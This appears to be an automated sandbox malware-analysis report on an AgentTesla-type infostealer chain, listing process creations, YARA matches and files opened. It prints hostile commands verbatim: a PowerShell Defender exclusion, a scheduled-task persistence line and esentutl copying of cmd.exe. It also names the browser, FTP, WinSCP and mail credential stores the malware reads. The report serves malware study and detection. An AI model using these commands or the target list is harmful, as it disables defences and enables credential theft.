Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02E45ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02E4A7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02E45BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02E4A810
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	32_2_02EE5ACC
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	32_2_02EE5BD7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: GetLocaleInfoA,	32_2_02EEA810

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E4920C GetLocalTime,

4_2_02E4920C

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E4B78C GetVersionExA,

4_2_02E4B78C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
